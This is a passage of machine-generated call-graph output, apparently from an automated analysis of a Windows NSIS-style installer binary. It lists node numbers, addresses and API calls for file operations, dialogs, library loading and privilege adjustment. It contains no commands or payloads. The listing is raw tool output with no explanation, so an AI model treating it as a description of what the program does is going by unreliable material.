3644->3645 3646 405c00 RemoveDirectoryW 3644->3646 3647 405c08 DeleteFileW 3644->3647 3645->3603 3648 405c0e 3646->3648 3647->3648 3648->3645 3649 405c1e SetFileAttributesW 3648->3649 3649->3645 3651 406302 3650->3651 3652 4062f5 3650->3652 3651->3603 3661 406167 3652->3661 3654->3624 3657 405eca 3655->3657 3658 405eb8 3655->3658 3656 405eee 3656->3627 3656->3628 3657->3656 3660 405e1d CharNextW 3657->3660 3658->3657 3659 405ec5 CharNextW 3658->3659 3659->3656 3660->3657 3662 406197 3661->3662 3663 4061bd GetShortPathNameW 3661->3663 3688 406011 GetFileAttributesW CreateFileW 3662->3688 3665 4061d2 3663->3665 3666 4062dc 3663->3666 3665->3666 3668 4061da wsprintfA 3665->3668 3666->3651 3667 4061a1 CloseHandle GetShortPathNameW 3667->3666 3669 4061b5 3667->3669 3670 40655e 21 API calls 3668->3670 3669->3663 3669->3666 3671 406202 3670->3671 3689 406011 GetFileAttributesW CreateFileW 3671->3689 3673 40620f 3673->3666 3674 40621e GetFileSize GlobalAlloc 3673->3674 3675 406240 3674->3675 3676 4062d5 CloseHandle 3674->3676 3677 406094 ReadFile 3675->3677 3676->3666 3678 406248 3677->3678 3678->3676 3690 405f76 lstrlenA 3678->3690 3681 406273 3683 405f76 4 API calls 3681->3683 3682 40625f lstrcpyA 3684 406281 3682->3684 3683->3684 3685 4062b8 SetFilePointer 3684->3685 3686 4060c3 WriteFile 3685->3686 3687 4062ce GlobalFree 3686->3687 3687->3676 3688->3667 3689->3673 3691 405fb7 lstrlenA 3690->3691 3692 405f90 lstrcmpiA 3691->3692 3693 405fbf 3691->3693 3692->3693 3694 405fae CharNextA 3692->3694 3693->3681 3693->3682 3694->3691 3695 4015c6 3696 402dab 21 API calls 3695->3696 3697 4015cd 3696->3697 3698 405e9b 4 API calls 3697->3698 3710 4015d6 3698->3710 3699 401636 3701 401668 3699->3701 3702 40163b 3699->3702 3700 405e1d CharNextW 3700->3710 3705 401423 28 API calls 3701->3705 3720 401423 3702->3720 3711 401660 3705->3711 3709 40164f SetCurrentDirectoryW 3709->3711 3710->3699 3710->3700 3712 40161c GetFileAttributesW 3710->3712 3714 405aec 3710->3714 3717 405a75 CreateDirectoryW 3710->3717 3724 405acf CreateDirectoryW 3710->3724 3712->3710 3715 406915 5 API calls 3714->3715 3716 405af3 3715->3716 3716->3710 3718 405ac1 3717->3718 3719 405ac5 GetLastError 3717->3719 3718->3710 3719->3718 3721 4055a6 28 API calls 3720->3721 3722 401431 3721->3722 3723 406521 lstrcpynW 3722->3723 3723->3709 3725 405ae3 GetLastError 3724->3725 3726 405adf 3724->3726 3725->3726 3726->3710 4027 401c48 4028 402d89 21 API calls 4027->4028 4029 401c4f 4028->4029 4030 402d89 21 API calls 4029->4030 4031 401c5c 4030->4031 4032 402dab 21 API calls 4031->4032 4035 401c71 4031->4035 4032->4035 4033 401cd8 4038 402dab 21 API calls 4033->4038 4034 401c8c 4037 402d89 21 API calls 4034->4037 4036 402dab 21 API calls 4035->4036 4039 401c81 4035->4039 4036->4039 4040 401c91 4037->4040 4041 401cdd 4038->4041 4039->4033 4039->4034 4042 402d89 21 API calls 4040->4042 4043 402dab 21 API calls 4041->4043 4044 401c9d 4042->4044 4045 401ce6 FindWindowExW 4043->4045 4046 401cc8 SendMessageW 4044->4046 4047 401caa SendMessageTimeoutW 4044->4047 4048 401d08 4045->4048 4046->4048 4047->4048 4056 4028c9 4057 4028cf 4056->4057 4058 4028d7 FindClose 4057->4058 4059 402c2f 4057->4059 4058->4059 4060 40494a 4061 404980 4060->4061 4062 40495a 4060->4062 4064 404507 8 API calls 4061->4064 4063 4044a0 22 API calls 4062->4063 4065 404967 SetDlgItemTextW 4063->4065 4066 40498c 4064->4066 4065->4061 4070 4016d1 4071 402dab 21 API calls 4070->4071 4072 4016d7 GetFullPathNameW 4071->4072 4073 4016f1 4072->4073 4079 401713 4072->4079 4076 40687e 2 API calls 4073->4076 4073->4079 4074 401728 GetShortPathNameW 4075 402c2f 4074->4075 4077 401703 4076->4077 4077->4079 4080 406521 lstrcpynW 4077->4080 4079->4074 4079->4075 4080->4079 4081 401e53 GetDC 4082 402d89 21 API calls 4081->4082 4083 401e65 GetDeviceCaps MulDiv ReleaseDC 4082->4083 4084 402d89 21 API calls 4083->4084 4085 401e96 4084->4085 4086 40655e 21 API calls 4085->4086 4087 401ed3 CreateFontIndirectW 4086->4087 4088 40263d 4087->4088 4089 402955 4090 402dab 21 API calls 4089->4090 4091 402961 4090->4091 4092 402977 4091->4092 4093 402dab 21 API calls 4091->4093 4094 405fec 2 API calls 4092->4094 4093->4092 4095 40297d 4094->4095 4117 406011 GetFileAttributesW CreateFileW 4095->4117 4097 40298a 4098 402a40 4097->4098 4099 4029a5 GlobalAlloc 4097->4099 4100 402a28 4097->4100 4101 402a47 DeleteFileW 4098->4101 4102 402a5a 4098->4102 4099->4100 4103 4029be 4099->4103 4104 4032b9 39 API calls 4100->4104 4101->4102 4118 4034b4 SetFilePointer 4103->4118 4106 402a35 CloseHandle 4104->4106 4106->4098 4107 4029c4 4108 40349e ReadFile 4107->4108 4109 4029cd GlobalAlloc 4108->4109 4110 402a11 4109->4110 4111 4029dd 4109->4111 4112 4060c3 WriteFile 4110->4112 4113 4032b9 39 API calls 4111->4113 4114 402a1d GlobalFree 4112->4114 4116 4029ea 4113->4116 4114->4100 4115 402a08 GlobalFree 4115->4110 4116->4115 4117->4097 4118->4107 4119 4045d6 lstrcpynW lstrlenW 4120 4014d7 4121 402d89 21 API calls 4120->4121 4122 4014dd Sleep 4121->4122 4124 402c2f 4122->4124 4125 40195b 4126 402dab 21 API calls 4125->4126 4127 401962 lstrlenW 4126->4127 4128 40263d 4127->4128 4129 4020dd 4130 4020ef 4129->4130 4140 4021a1 4129->4140 4131 402dab 21 API calls 4130->4131 4132 4020f6 4131->4132 4134 402dab 21 API calls 4132->4134 4133 401423 28 API calls 4135 4022fb 4133->4135 4136 4020ff 4134->4136 4137 402115 LoadLibraryExW 4136->4137 4138 402107 GetModuleHandleW 4136->4138 4139 402126 4137->4139 4137->4140 4138->4137 4138->4139 4149 406984 4139->4149 4140->4133 4143 402170 4145 4055a6 28 API calls 4143->4145 4144 402137 4146 401423 28 API calls 4144->4146 4147 402147 4144->4147 4145->4147 4146->4147 4147->4135 4148 402193 FreeLibrary 4147->4148 4148->4135 4154 406543 WideCharToMultiByte 4149->4154 4151 4069a1 4152 4069a8 GetProcAddress 4151->4152 4153 402131 4151->4153 4152->4153 4153->4143 4153->4144 4154->4151 4155 402b5e 4156 402bb0 4155->4156 4157 402b65 4155->4157 4158 406915 5 API calls 4156->4158 4159 402bae 4157->4159 4161 402d89 21 API calls 4157->4161 4160 402bb7 4158->4160 4162 402dab 21 API calls 4160->4162 4163 402b73 4161->4163 4164 402bc0 4162->4164 4165 402d89 21 API calls 4163->4165 4164->4159 4166 402bc4 IIDFromString 4164->4166 4168 402b7f 4165->4168 4166->4159 4167 402bd3 4166->4167 4167->4159 4173 406521 lstrcpynW 4167->4173 4172 406468 wsprintfW 4168->4172 4170 402bf0 CoTaskMemFree 4170->4159 4172->4159 4173->4170 4181 40465f 4182 404791 4181->4182 4184 404677 4181->4184 4183 4047fb 4182->4183 4185 4048c5 4182->4185 4190 4047cc GetDlgItem SendMessageW 4182->4190 4183->4185 4186 404805 GetDlgItem 4183->4186 4187 4044a0 22 API calls 4184->4187 4192 404507 8 API calls 4185->4192 4188 404886 4186->4188 4189 40481f 4186->4189 4191 4046de 4187->4191 4188->4185 4194 404898 4188->4194 4189->4188 4193 404845 SendMessageW LoadCursorW SetCursor 4189->4193 4214 4044c2 KiUserCallbackDispatcher 4190->4214 4196 4044a0 22 API calls 4191->4196 4203 4048c0 4192->4203 4218 40490e 4193->4218 4198 4048ae 4194->4198 4199 40489e SendMessageW 4194->4199 4201 4046eb CheckDlgButton 4196->4201 4198->4203 4204 4048b4 SendMessageW 4198->4204 4199->4198 4200 4047f6 4215 4048ea 4200->4215 4212 4044c2 KiUserCallbackDispatcher 4201->4212 4204->4203 4207 404709 GetDlgItem 4213 4044d5 SendMessageW 4207->4213 4209 40471f SendMessageW 4210 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4209->4210 4211 40473c GetSysColor 4209->4211 4210->4203 4211->4210 4212->4207 4213->4209 4214->4200 4216 4048f8 4215->4216 4217 4048fd SendMessageW 4215->4217 4216->4217 4217->4183 4221 405b47 ShellExecuteExW 4218->4221 4220 404874 LoadCursorW SetCursor 4220->4188 4221->4220 4222 402a60 4223 402d89 21 API calls 4222->4223 4224 402a66 4223->4224 4225 402aa9 4224->4225 4226 402a8d 4224->4226 4232 402933 4224->4232 4229 402ac3 4225->4229 4230 402ab3 4225->4230 4227 402a92 4226->4227 4228 402aa3 4226->4228 4236 406521 lstrcpynW 4227->4236 4228->4232 4237 406468 wsprintfW 4228->4237 4231 40655e 21 API calls 4229->4231 4233 402d89 21 API calls 4230->4233 4231->4228 4233->4228 4236->4232 4237->4232 3285 401761 3291 402dab 3285->3291 3289 40176f 3290 406040 2 API calls 3289->3290 3290->3289 3292 402db7 3291->3292 3293 40655e 21 API calls 3292->3293 3294 402dd8 3293->3294 3295 401768 3294->3295 3296 4067cf 5 API calls 3294->3296 3297 406040 3295->3297 3296->3295 3298 40604d GetTickCount GetTempFileNameW 3297->3298 3299 406087 3298->3299 3300 406083 3298->3300 3299->3289 3300->3298 3300->3299 4238 401d62 4239 402d89 21 API calls 4238->4239 4240 401d73 SetWindowLongW 4239->4240 4241 402c2f 4240->4241 4242 4028e3 4243 4028eb 4242->4243 4244 4028ef FindNextFileW 4243->4244 4246 402901 4243->4246 4245 402948 4244->4245 4244->4246 4248 406521 lstrcpynW 4245->4248 4248->4246 3522 4056e5 3523 405706 GetDlgItem GetDlgItem GetDlgItem 3522->3523 3524 40588f 3522->3524 3567 4044d5 SendMessageW 3523->3567 3526 4058c0 3524->3526 3527 405898 GetDlgItem CreateThread CloseHandle 3524->3527 3528 4058eb 3526->3528 3530 405910 3526->3530 3531 4058d7 ShowWindow ShowWindow 3526->3531 3527->3526 3570 405679 OleInitialize 3527->3570 3532 40594b 3528->3532 3535 405925 ShowWindow 3528->3535 3536 4058ff 3528->3536 3529 405776 3533 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3529->3533 3537 404507 8 API calls 3530->3537 3569 4044d5 SendMessageW 3531->3569 3532->3530 3540 405959 SendMessageW 3532->3540 3538 4057eb 3533->3538 3539 4057cf SendMessageW SendMessageW 3533->3539 3543 405945 3535->3543 3544 405937 3535->3544 3541 404479 SendMessageW 3536->3541 3542 40591e 3537->3542 3545 4057f0 SendMessageW 3538->3545 3546 4057fe 3538->3546 3539->3538 3540->3542 3547 405972 CreatePopupMenu 3540->3547 3541->3530 3549 404479 SendMessageW 3543->3549 3548 4055a6 28 API calls 3544->3548 3545->3546 3551 4044a0 22 API calls 3546->3551 3550 40655e 21 API calls 3547->3550 3548->3543 3549->3532 3552 405982 AppendMenuW 3550->3552 3553 40580e 3551->3553 3554 4059b2 TrackPopupMenu 3552->3554 3555 40599f GetWindowRect 3552->3555 3556 405817 ShowWindow 3553->3556 3557 40584b GetDlgItem SendMessageW 3553->3557 3554->3542 3558 4059cd 3554->3558 3555->3554 3559 40583a 3556->3559 3560 40582d ShowWindow 3556->3560 3557->3542 3561 405872 SendMessageW SendMessageW 3557->3561 3562 4059e9 SendMessageW 3558->3562 3568 4044d5 SendMessageW 3559->3568 3560->3559 3561->3542 3562->3562 3563 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3562->3563 3565 405a2b SendMessageW 3563->3565 3565->3565 3566 405a54 GlobalUnlock SetClipboardData CloseClipboard 3565->3566 3566->3542 3567->3529 3568->3557 3569->3528 3571 4044ec SendMessageW 3570->3571 3572 40569c 3571->3572 3575 401389 2 API calls 3572->3575 3576 4056c3 3572->3576 3573 4044ec SendMessageW 3574 4056d5 CoUninitialize 3573->3574 3575->3572 3576->3573 4249 404ce7 4250 404d13 4249->4250 4251 404cf7 4249->4251 4253 404d46 4250->4253 4254 404d19 SHGetPathFromIDListW 4250->4254 4260 405b65 GetDlgItemTextW 4251->4260 4255 404d30 SendMessageW 4254->4255 4256 404d29 4254->4256 4255->4253 4258 40140b 2 API calls 4256->4258 4257 404d04 SendMessageW 4257->4250 4258->4255 4260->4257 4261 401568 4262 402ba9 4261->4262 4265 406468 wsprintfW 4262->4265 4264 402bae 4265->4264 4266 40196d 4267 402d89 21 API calls 4266->4267 4268 401974 4267->4268 4269 402d89 21 API calls 4268->4269 4270 401981 4269->4270 4271 402dab 21 API calls 4270->4271 4272 401998 lstrlenW 4271->4272 4273 4019a9 4272->4273 4274 4019ea 4273->4274 4278 406521 lstrcpynW 4273->4278 4276 4019da 4276->4274 4277 4019df lstrlenW 4276->4277 4277->4274 4278->4276 4279 40166f 4280 402dab 21 API calls 4279->4280 4281 401675 4280->4281 4282 40687e 2 API calls 4281->4282 4283 40167b 4282->4283 4284 402af0 4285 402d89 21 API calls 4284->4285 4286 402af6 4285->4286 4287 40655e 21 API calls 4286->4287 4288 402933 4286->4288 4287->4288 4289 4026f1 4290 402d89 21 API calls 4289->4290 4298 402700 4290->4298 4291 40274a ReadFile 4291->4298 4301 40283d 4291->4301 4292 406094 ReadFile 4292->4298 4293 40278a MultiByteToWideChar 4293->4298 4294 40283f 4302 406468 wsprintfW 4294->4302 4295 4060f2 5 API calls 4295->4298 4297 4027b0 SetFilePointer MultiByteToWideChar 4297->4298 4298->4291 4298->4292 4298->4293 4298->4294 4298->4295 4298->4297 4299 402850 4298->4299 4298->4301 4300 402871 SetFilePointer 4299->4300 4299->4301 4300->4301 4302->4301 3410 401774 3411 402dab 21 API calls 3410->3411 3412 40177b 3411->3412 3413 4017a3 3412->3413 3414 40179b 3412->3414 3485 406521 lstrcpynW 3413->3485 3484 406521 lstrcpynW 3414->3484 3417 4017a1 3421 4067cf 5 API calls 3417->3421 3418 4017ae 3486 405df0 lstrlenW CharPrevW 3418->3486 3437 4017c0 3421->3437 3425 4017d2 CompareFileTime 3425->3437 3426 401892 3452 4055a6 3426->3452 3427 401869 3429 4055a6 28 API calls 3427->3429 3439 40187e 3427->3439 3429->3439 3433 406521 lstrcpynW 3433->3437 3434 4018c3 SetFileTime 3435 4018d5 CloseHandle 3434->3435 3438 4018e6 3435->3438 3435->3439 3436 40655e 21 API calls 3436->3437 3437->3425 3437->3426 3437->3427 3437->3433 3437->3436 3444 405b81 MessageBoxIndirectW 3437->3444 3448 405fec GetFileAttributesW 3437->3448 3451 406011 GetFileAttributesW CreateFileW 3437->3451 3489 40687e FindFirstFileW 3437->3489 3440 4018eb 3438->3440 3441 4018fe 3438->3441 3442 40655e 21 API calls 3440->3442 3443 40655e 21 API calls 3441->3443 3445 4018f3 lstrcatW 3442->3445 3446 401906 3443->3446 3444->3437 3445->3446 3447 405b81 MessageBoxIndirectW 3446->3447 3447->3439 3449 40600b 3448->3449 3450 405ffe SetFileAttributesW 3448->3450 3449->3437 3450->3449 3451->3437 3453 4055c1 3452->3453 3454 40189c 3452->3454 3455 4055dd lstrlenW 3453->3455 3456 40655e 21 API calls 3453->3456 3463 4032b9 3454->3463 3457 405606 3455->3457 3458 4055eb lstrlenW 3455->3458 3456->3455 3460 405619 3457->3460 3461 40560c SetWindowTextW 3457->3461 3458->3454 3459 4055fd lstrcatW 3458->3459 3459->3457 3460->3454 3462 40561f SendMessageW SendMessageW SendMessageW 3460->3462 3461->3460 3462->3454 3465 4032d2 3463->3465 3464 4032fd 3492 40349e 3464->3492 3465->3464 3504 4034b4 SetFilePointer 3465->3504 3469 40331a GetTickCount 3480 40332d 3469->3480 3470 40343e 3471 403442 3470->3471 3476 40345a 3470->3476 3473 40349e ReadFile 3471->3473 3472 4018af 3472->3434 3472->3435 3473->3472 3474 40349e ReadFile 3474->3476 3475 40349e ReadFile 3475->3480 3476->3472 3476->3474 3477 4060c3 WriteFile 3476->3477 3477->3476 3479 403393 GetTickCount 3479->3480 3480->3472 3480->3475 3480->3479 3481 4033bc MulDiv wsprintfW 3480->3481 3495 406a90 3480->3495 3502 4060c3 WriteFile 3480->3502 3482 4055a6 28 API calls 3481->3482 3482->3480 3484->3417 3485->3418 3487 4017b4 lstrcatW 3486->3487 3488 405e0c lstrcatW 3486->3488 3487->3417 3488->3487 3490 406894 FindClose 3489->3490 3491 40689f 3489->3491 3490->3491 3491->3437 3505 406094 ReadFile 3492->3505 3496 406ab5 3495->3496 3497 406abd 3495->3497 3496->3480 3497->3496 3498 406b44 GlobalFree 3497->3498 3499 406b4d GlobalAlloc 3497->3499 3500 406bc4 GlobalAlloc 3497->3500 3501 406bbb GlobalFree 3497->3501 3498->3499 3499->3496 3499->3497 3500->3496 3500->3497 3501->3500 3503 4060e1 3502->3503 3503->3480 3504->3464 3506 403308 3505->3506 3506->3469 3506->3470 3506->3472 4317 4014f5 SetForegroundWindow 4318 402c2f 4317->4318 4319 401a77 4320 402d89 21 API calls 4319->4320 4321 401a80 4320->4321 4322 402d89 21 API calls 4321->4322 4323 401a25 4322->4323 3737 401578 3738 401591 3737->3738 3739 401588 ShowWindow 3737->3739 3740 402c2f 3738->3740 3741 40159f ShowWindow 3738->3741 3739->3738 3741->3740 4324 4023f9 4325 402dab 21 API calls 4324->4325 4326 402408 4325->4326 4327 402dab 21 API calls 4326->4327 4328 402411 4327->4328 4329 402dab 21 API calls 4328->4329 4330 40241b GetPrivateProfileStringW 4329->4330 4331 401ffb 4332 402dab 21 API calls 4331->4332 4333 402002 4332->4333 4334 40687e 2 API calls 4333->4334 4335 402008 4334->4335 4337 402019 4335->4337 4338 406468 wsprintfW 4335->4338 4338->4337 3770 4034fc SetErrorMode GetVersionExW 3771 403550 GetVersionExW 3770->3771 3772 403588 3770->3772 3771->3772 3773 4035df 3772->3773 3774 406915 5 API calls 3772->3774 3775 4068a5 3 API calls 3773->3775 3774->3773 3776 4035f5 lstrlenA 3775->3776 3776->3773 3777 403605 3776->3777 3778 406915 5 API calls 3777->3778 3779 40360c 3778->3779 3780 406915 5 API calls 3779->3780 3781 403613 3780->3781 3782 406915 5 API calls 3781->3782 3783 40361f #17 OleInitialize SHGetFileInfoW 3782->3783 3858 406521 lstrcpynW 3783->3858 3786 40366e GetCommandLineW 3859 406521 lstrcpynW 3786->3859 3788 403680 3789 405e1d CharNextW 3788->3789 3790 4036a6 CharNextW 3789->3790 3796 4036b8 3790->3796 3791 4037ba 3792 4037ce GetTempPathW 3791->3792 3860 4034cb 3792->3860 3794 4037e6 3797 403840 DeleteFileW 3794->3797 3798 4037ea GetWindowsDirectoryW lstrcatW 3794->3798 3795 405e1d CharNextW 3795->3796 3796->3791 3796->3795 3804 4037bc 3796->3804 3870 403082 GetTickCount GetModuleFileNameW 3797->3870 3799 4034cb 12 API calls 3798->3799 3801 403806 3799->3801 3801->3797 3803 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3801->3803 3802 403854 3810 405e1d CharNextW 3802->3810 3841 4038fb 3802->3841 3849 40390b 3802->3849 3805 4034cb 12 API calls 3803->3805 3954 406521 lstrcpynW 3804->3954 3808 403838 3805->3808 3808->3797 3808->3849 3815 403873 3810->3815 3812 403a59 3814 405b81 MessageBoxIndirectW 3812->3814 3813 403a7d 3816 403a85 GetCurrentProcess OpenProcessToken 3813->3816 3819 403b01 ExitProcess 3813->3819 3821 403a67 ExitProcess 3814->3821 3817 4038d1 3815->3817 3818 403914 3815->3818 3822 403ad1 3816->3822 3823 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3816->3823 3825 405ef8 18 API calls 3817->3825 3826 405aec 5 API calls 3818->3826 3824 406915 5 API calls 3822->3824 3823->3822 3827 403ad8 3824->3827 3828 4038dd 3825->3828 3829 403919 lstrlenW 3826->3829 3831 403aed ExitWindowsEx 3827->3831 3833 403afa 3827->3833 3828->3849 3955 406521 lstrcpynW 3828->3955 3957 406521 lstrcpynW 3829->3957 3831->3819 3831->3833 3832 403933 3835 40394b 3832->3835 3958 406521 lstrcpynW 3832->3958 3836 40140b 2 API calls 3833->3836 3840 403971 wsprintfW 3835->3840 3855 40399d 3835->3855 3836->3819 3837 4038f0 3956 406521 lstrcpynW 3837->3956 3842 40655e 21 API calls 3840->3842 3898 403bf3 3841->3898 3842->3835 3843 405a75 2 API calls 3843->3855 3844 405acf 2 API calls 3844->3855 3845 4039e7 SetCurrentDirectoryW 3848 4062e1 40 API calls 3845->3848 3846 4039ad GetFileAttributesW 3847 4039b9 DeleteFileW 3846->3847 3846->3855 3847->3855 3850 4039f6 CopyFileW 3848->3850 3959 403b19 3849->3959 3850->3849 3850->3855 3851 405c2d 71 API calls 3851->3855 3852 4062e1 40 API calls 3852->3855 3853 40655e 21 API calls 3853->3855 3854 405b04 2 API calls 3854->3855 3855->3835 3855->3840 3855->3843 3855->3844 3855->3845 3855->3846 3855->3849 3855->3851 3855->3852 3855->3853 3855->3854 3856 403a6f CloseHandle 3855->3856 3857 40687e 2 API calls 3855->3857 3856->3849 3857->3855 3858->3786 3859->3788 3861 4067cf 5 API calls 3860->3861 3862 4034d7 3861->3862 3863 4034e1 3862->3863 3864 405df0 3 API calls 3862->3864 3863->3794 3865 4034e9 3864->3865 3866 405acf 2 API calls 3865->3866 3867 4034ef 3866->3867 3868 406040 2 API calls 3867->3868 3869 4034fa 3868->3869 3869->3794 3966 406011 GetFileAttributesW CreateFileW 3870->3966 3872 4030c2 3890 4030d2 3872->3890 3967 406521 lstrcpynW 3872->3967 3874 4030e8 3875 405e3c 2 API calls 3874->3875 3876 4030ee 3875->3876 3968 406521 lstrcpynW 3876->3968 3878 4030f9 GetFileSize 3879 4031f3 3878->3879 3892 403110 3878->3892 3969 40301e 3879->3969 3881 4031fc 3883 40322c GlobalAlloc 3881->3883 3881->3890 3981 4034b4 SetFilePointer 3881->3981 3882 40349e ReadFile 3882->3892 3980 4034b4 SetFilePointer 3883->3980 3885 40325f 3887 40301e 6 API calls 3885->3887 3887->3890 3888 403215 3891 40349e ReadFile 3888->3891 3889 403247 3893 4032b9 39 API calls 3889->3893 3890->3802 3894 403220 3891->3894 3892->3879 3892->3882 3892->3885 3892->3890 3895 40301e 6 API calls 3892->3895 3896 403253 3893->3896 3894->3883 3894->3890 3895->3892 3896->3890 3896->3896 3897 403290 SetFilePointer 3896->3897 3897->3890 3899 406915 5 API calls 3898->3899 3900 403c07 3899->3900 3901 403c0d 3900->3901 3902 403c1f 3900->3902 3990 406468 wsprintfW 3901->3990 3903 4063ef 3 API calls 3902->3903 3904 403c4f 3903->3904 3906 403c6e lstrcatW 3904->3906 3908 4063ef 3 API calls 3904->3908 3907 403c1d 3906->3907 3982 403ec9 3907->3982 3908->3906 3911 405ef8 18 API calls 3912 403ca0 3911->3912 3913 403d34 3912->3913 3915 4063ef 3 API calls 3912->3915 3914 405ef8 18 API calls 3913->3914 3916 403d3a 3914->3916 3917 403cd2 3915->3917 3918 403d4a LoadImageW 3916->3918 3919 40655e 21 API calls 3916->3919 3917->3913 3922 403cf3 lstrlenW 3917->3922 3925 405e1d CharNextW 3917->3925 3920 403df0 3918->3920 3921 403d71 RegisterClassW 3918->3921 3919->3918 3924 40140b 2 API calls 3920->3924 3923 403da7 SystemParametersInfoW CreateWindowExW 3921->3923 3953 403dfa 3921->3953 3926 403d01 lstrcmpiW 3922->3926 3927 403d27 3922->3927 3923->3920 3928 403df6 3924->3928 3929 403cf0 3925->3929 3926->3927 3930 403d11 GetFileAttributesW 3926->3930 3931 405df0 3 API calls 3927->3931 3933 403ec9 22 API calls 3928->3933 3928->3953 3929->3922 3932 403d1d 3930->3932 3934 403d2d 3931->3934 3932->3927 3936 405e3c 2 API calls 3932->3936 3937 403e07 3933->3937 3991 406521 lstrcpynW 3934->3991 3936->3927 3938 403e13 ShowWindow 3937->3938 3939 403e96 3937->3939 3940 4068a5 3 API calls 3938->3940 3941 405679 5 API calls 3939->3941 3942 403e2b 3940->3942 3943 403e9c 3941->3943 3944 403e39 GetClassInfoW 3942->3944 3947 4068a5 3 API calls 3942->3947 3945 403ea0 3943->3945 3946 403eb8 3943->3946 3949 403e63 DialogBoxParamW 3944->3949 3950 403e4d GetClassInfoW RegisterClassW 3944->3950 3951 40140b 2 API calls 3945->3951 3945->3953 3948 40140b 2 API calls 3946->3948 3947->3944 3948->3953 3952 40140b 2 API calls 3949->3952 3950->3949 3951->3953 3952->3953 3953->3849 3954->3792 3955->3837 3956->3841 3957->3832 3958->3835 3960 403b31 3959->3960 3961 403b23 CloseHandle 3959->3961 3993 403b5e 3960->3993 3961->3960 3964 405c2d 71 API calls 3965 403a4c OleUninitialize 3964->3965 3965->3812 3965->3813 3966->3872 3967->3874 3968->3878 3970 403027 3969->3970 3971 40303f 3969->3971 3972 403030 DestroyWindow 3970->3972 3973 403037 3970->3973 3974 403047 3971->3974 3975 40304f GetTickCount 3971->3975 3972->3973 3973->3881 3976 406951 2 API calls 3974->3976 3977 403080 3975->3977 3978 40305d CreateDialogParamW ShowWindow 3975->3978 3979 40304d 3976->3979 3977->3881 3978->3977 3979->3881 3980->3889 3981->3888 3983 403edd 3982->3983 3992 406468 wsprintfW 3983->3992 3985 403f4e 3986 403f82 22 API calls 3985->3986 3988 403f53 3986->3988 3987 403c7e 3987->3911 3988->3987 3989 40655e 21 API calls 3988->3989 3989->3988 3990->3907 3991->3913 3992->3985 3994 403b6c 3993->3994 3995 403b36 3994->3995 3996 403b71 FreeLibrary GlobalFree 3994->3996 3995->3964 3996->3995 3996->3996 4339 401b7c 4340 402dab 21 API calls 4339->4340 4341 401b83 4340->4341 4342 402d89 21 API calls 4341->4342 4343 401b8c wsprintfW 4342->4343 4344 402c2f 4343->4344 4352 401000 4353 401037 BeginPaint GetClientRect 4352->4353 4354 40100c DefWindowProcW 4352->4354 4356 4010f3 4353->4356 4359 401179 4354->4359 4357 401073 CreateBrushIndirect FillRect DeleteObject 4356->4357 4358 4010fc 4356->4358 4357->4356 4360 401102 CreateFontIndirectW 4358->4360 4361 401167 EndPaint 4358->4361 4360->4361 4362 401112 6 API calls 4360->4362 4361->4359 4362->4361 4363 401680 4364 402dab 21 API calls 4363->4364 4365 401687 4364->4365 4366 402dab 21 API calls 4365->4366 4367 401690 4366->4367 4368 402dab 21 API calls 4367->4368 4369 401699 MoveFileW 4368->4369 4370 4016ac 4369->4370 4376 4016a5 4369->4376 4371 4022fb 4370->4371 4373 40687e 2 API calls 4370->4373 4372 401423 28 API calls 4372->4371 4374 4016bb 4373->4374 4374->4371 4375 4062e1 40 API calls 4374->4375 4375->4376 4376->4372 4377 401503 4378 401520 4377->4378 4379 401508 4377->4379 4380 402d89 21 API calls 4379->4380 4380->4378 3507 402304 3508 402dab 21 API calls 3507->3508 3509 40230a 3508->3509 3510 402dab 21 API calls 3509->3510 3511 402313 3510->3511 3512 402dab 21 API calls 3511->3512 3513 40231c 3512->3513 3514 40687e 2 API calls 3513->3514 3515 402325 3514->3515 3516 402336 lstrlenW lstrlenW 3515->3516 3520 402329 3515->3520 3518 4055a6 28 API calls 3516->3518 3517 4055a6 28 API calls 3521 402331 3517->3521 3519 402374 SHFileOperationW 3518->3519 3519->3520 3519->3521 3520->3517 3520->3521 4381 401a04 4382 402dab 21 API calls 4381->4382 4383 401a0b 4382->4383 4384 402dab 21 API calls 4383->4384 4385 401a14 4384->4385 4386 401a1b lstrcmpiW 4385->4386 4387 401a2d lstrcmpW 4385->4387 4388 401a21 4386->4388 4387->4388 4389 401d86 4390 401d99 GetDlgItem 4389->4390 4391 401d8c 4389->4391 4393 401d93 4390->4393 4392 402d89 21 API calls 4391->4392 4392->4393 4394 402dab 21 API calls 4393->4394 4396 401dda GetClientRect LoadImageW SendMessageW 4393->4396 4394->4396 4397 401e38 4396->4397 4399 401e44 4396->4399 4398 401e3d DeleteObject 4397->4398 4397->4399 4398->4399 4400 402388 4401 4023a2 4400->4401 4402 40238f 4400->4402 4403 40655e 21 API calls 4402->4403 4404 40239c 4403->4404 4405 405b81 MessageBoxIndirectW 4404->4405 4405->4401 4406 402c0a SendMessageW 4407 402c24 InvalidateRect 4406->4407 4408 402c2f 4406->4408 4407->4408 4416 404f0d GetDlgItem GetDlgItem 4417 404f5f 7 API calls 4416->4417 4429 405184 4416->4429 4418 405006 DeleteObject 4417->4418 4419 404ff9 SendMessageW 4417->4419 4420 40500f 4418->4420 4419->4418 4421 405046 4420->4421 4425 40655e 21 API calls 4420->4425 4422 4044a0 22 API calls 4421->4422 4426 40505a 4422->4426 4423 405312 4427 405324 4423->4427 4428 40531c SendMessageW 4423->4428 4424 405266 4424->4423 4432 4052bf SendMessageW 4424->4432 4459 405177 4424->4459 4430 405028 SendMessageW SendMessageW 4425->4430 4431 4044a0 22 API calls 4426->4431 4439 405336 ImageList_Destroy 4427->4439 4440 40533d 4427->4440 4448 40534d 4427->4448 4428->4427 4429->4424 4446 4051f3 4429->4446 4470 404e5b SendMessageW 4429->4470 4430->4420 4447 40506b 4431->4447 4437 4052d4 SendMessageW 4432->4437 4432->4459 4433 405258 SendMessageW 4433->4424 4434 404507 8 API calls 4438 405513 4434->4438 4436 4054c7 4444 4054d9 ShowWindow GetDlgItem ShowWindow 4436->4444 4436->4459 4443 4052e7 4437->4443 4439->4440 4441 405346 GlobalFree 4440->4441 4440->4448 4441->4448 4442 405146 GetWindowLongW SetWindowLongW 4445 40515f 4442->4445 4454 4052f8 SendMessageW 4443->4454 4444->4459 4449 405164 ShowWindow 4445->4449 4450 40517c 4445->4450 4446->4424 4446->4433 4447->4442 4453 4050be SendMessageW 4447->4453 4455 405141 4447->4455 